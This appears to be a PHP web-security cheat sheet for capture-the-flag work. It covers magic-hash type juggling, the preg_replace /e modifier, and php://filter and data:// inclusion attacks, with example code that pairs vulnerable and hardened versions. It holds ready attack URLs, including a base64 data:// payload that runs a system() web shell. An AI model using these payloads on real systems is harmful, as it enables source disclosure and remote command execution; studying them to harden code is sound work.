PHP

  • Magic Hashes - CheatSheet

    In PHP, == applies type juggling. A hash such as 0e462097431906509019562988736854 is a numeric string in scientific notation (0 times 10 to some power), so PHP evaluates it as 0, and any two hashes of the form 0e followed only by decimal digits compare equal with == even though they are different strings. A login that checks md5($password) == $stored_hash can therefore be bypassed whenever the stored hash has this form: any password whose hash also has it is accepted. This still holds on PHP 8, whose comparison changes only affect numbers compared against non-numeric strings. Use === or hash_equals() instead.

    Such hashes are rarer than they look: 1/256 of MD5 digests start with 0e, but each of the remaining 30 hex characters must also be a decimal digit, a further factor of (10/16)^30, so only about one digest in 340 million qualifies. Brute-forcing strings over a small alphabet until one hits is still cheap on a single machine.

    example: md5("240610708") = 0e462097431906509019562988736854
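    The loose comparison described above, the strict check that closes it, and a brute-force search for further magic hashes, as an added PHP example (not code from the original page). The input QNKCDZO is a second well-known magic-hash preimage; the login helper names and the search alphabet are assumptions.

```php
<?php
// Added example (not code from the original page): PHP loose comparison on
// "magic" hashes, the strict comparison that closes the hole, and a search
// for further magic hashes.

// "240610708" is the page's example; "QNKCDZO" is another well-known input
// whose MD5 digest also has the form 0e<digits>. Both are numeric strings to
// PHP: 0e462... means 0 times 10^462..., which is 0.
$magic1 = md5('240610708');   // 0e462097431906509019562988736854
$magic2 = md5('QNKCDZO');     // 0e830400451993494058024219903391

// Vulnerable login check: == on two numeric strings compares them as numbers,
// so any password whose MD5 is 0e<digits> matches a stored 0e<digits> hash.
// PHP 8 behaves the same here: its comparison change only affects a number
// compared against a non-numeric string, not numeric string vs numeric string.
function loose_password_check(string $storedHash, string $password): bool {
    return $storedHash == md5($password);   // juggled: 0 == 0 for two magic hashes
}

// Fixed: compare bytes, not juggled values. hash_equals() is also constant
// time, which is what any secret comparison should be.
function strict_password_check(string $storedHash, string $password): bool {
    return hash_equals($storedHash, md5($password));
}

// A digest is "magic" only if it is 0e followed by decimal digits to the end;
// a single hex letter after the 0e breaks the numeric-string interpretation.
function is_magic_hash(string $hex): bool {
    return preg_match('/^0e[0-9]+$/', $hex) === 1;
}

// Brute-force search: try $limit strings of length $length over $alphabet
// (enumerated in counter order) and return those whose digest is magic.
// For MD5 the expected cost is about one hit per 3.4e8 candidates
// (1/256 for the "0e" prefix times (10/16)^30 for the remaining characters),
// so $limit has to be in the hundreds of millions to expect a hit; a small
// $limit just exercises the loop.
function find_magic_hashes(string $alphabet, int $length, int $limit, string $algo = 'md5'): array {
    $found = [];
    $base  = strlen($alphabet);
    for ($i = 0; $i < $limit; $i++) {
        $s = '';
        $x = $i;
        for ($j = 0; $j < $length; $j++) {
            $s .= $alphabet[$x % $base];
            $x  = intdiv($x, $base);
        }
        $digest = hash($algo, $s);
        if (is_magic_hash($digest)) {
            $found[$s] = $digest;
        }
    }
    return $found;
}

// Demonstration: the juggled comparison, the bytewise one, and the search.
var_dump($magic1 == $magic2);                         // juggled to 0 == 0
var_dump($magic1 === $magic2);                        // bytewise, no juggling
var_dump(loose_password_check($magic1, 'QNKCDZO'));   // the bypass
var_dump(strict_password_check($magic1, 'QNKCDZO'));  // the fix
var_dump(is_magic_hash($magic1), is_magic_hash(md5('password')));
print_r(find_magic_hashes('abcdefghijklmnopqrstuvwxyz0123456789', 6, 100000));
```

    The same search works for sha1 by passing 'sha1' as $algo; the odds are worse because the digest has 40 characters, so 38 of them must be digits.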

  • preg_replace - Manual

    In older PHP versions, the /e modifier made preg_replace() evaluate the replacement string as PHP code. If user input reaches the pattern (so the attacker can add /e) or the replacement, this is remote code execution. The modifier was deprecated in PHP 5.5 and removed in PHP 7.0; preg_replace_callback() is the replacement.

  • phpdc.phpr - GitHub

    A command-line tool to decode PHP code compiled with bcompiler, useful when a challenge or an application ships only the compiled form.

  • php://filter for Local File Inclusion - Website

    Not a bug in PHP itself but a consequence of letting user input reach include(): if a GET parameter controls which file a page include()s, the php://filter wrapper can wrap the target in a conversion filter. With convert.base64-encode the file's source is returned base64-encoded instead of being executed, which is how you read index.php, config files and so on through a local file inclusion. This works with allow_url_include=Off, since php:// is a local wrapper, and it survives an appended suffix such as '.php' because the suffix simply becomes part of the resource name. Example:

    http://example.com/index.php?m=php://filter/convert.base64-encode/resource=index
  • data://text/plain;base64

    A PHP stream wrapper whose content is the data in the URL itself. If a user-controlled value is include()d or otherwise evaluated, the base64 payload is decoded and executed as PHP, giving remote code execution; see this writeup: https://ctftime.org/writeup/8868. Unlike php://filter, the data:// wrapper is treated as remote for include purposes and only works when allow_url_include=On (it is Off by default). The payload below decodes to <?php echo system($_GET['cmd']); ?>:

    http://domain.net?cmd=whoami&page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=
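    The include() pattern that both the php://filter and the data:// entries above abuse, in vulnerable and hardened form, as an added PHP example (not code from the original page or from the linked writeup). The parameter name page, the pages/ directory layout and the helper names are assumptions.

```php
<?php
// Added example (not code from the original page): a page-dispatch include()
// that php://filter and data:// payloads abuse, and a hardened version.

/*
 * VULNERABLE: the GET parameter reaches include() unchanged, so any stream
 * wrapper PHP understands becomes an include target.
 *
 *   ?page=php://filter/convert.base64-encode/resource=index.php
 *     include() reads index.php through the filter and outputs its
 *     base64-encoded source instead of executing it. Works with
 *     allow_url_include=Off, since php:// is a local wrapper.
 *
 *   ?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=
 *     The decoded <?php echo system($_GET['cmd']); ?> is executed.
 *     Needs allow_url_include=On (default Off).
 *
 * Appending a suffix does not help: include($page . '.php') still accepts
 * php://filter/convert.base64-encode/resource=index, because ".php" just
 * becomes part of the resource name.
 */
function render_vulnerable(string $page): void {
    include $page;
}

// HARDENED: the parameter selects an entry from a fixed map of real files;
// no part of the user's string is ever used as a path or wrapper.
function page_map(): array {
    return [
        'home'  => __DIR__ . '/pages/home.php',   // assumed layout
        'about' => __DIR__ . '/pages/about.php',
    ];
}

function resolve_page(string $page): ?string {
    return page_map()[$page] ?? null;
}

function render_safe(string $page): void {
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'not found';
        return;
    }
    include $file;
}

// Detection helper: flag any value that names a stream wrapper (php://,
// data://, http://, ...). Useful for logging and WAF rules, but not a
// substitute for the allowlist above, since plain traversal such as
// ../../etc/passwd carries no scheme at all.
function looks_like_wrapper(string $value): bool {
    return preg_match('#^[a-z][a-z0-9+.\-]*://#i', $value) === 1;
}

// Decode what a php://filter/convert.base64-encode leak returns so the
// recovered source can be read; strict mode rejects non-base64 bodies.
function decode_filter_leak(string $body): string {
    $decoded = base64_decode($body, true);
    return $decoded === false ? '' : $decoded;
}

// Dispatch.
$page = $_GET['page'] ?? 'home';
if (looks_like_wrapper($page)) {
    error_log('possible LFI probe: ' . rawurlencode($page));
}
render_safe($page);
```

    Checking ini_get('allow_url_include') on a target tells you whether data:// is viable; php://filter needs no such setting, which is why the source-disclosure variant is the one that works most often.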
  • PHP Generic Gadget Chains - GitHub

    A library of gadget chains, with a command-line generator, for PHP object injection through unserialize() in common frameworks and libraries (PHPGGC).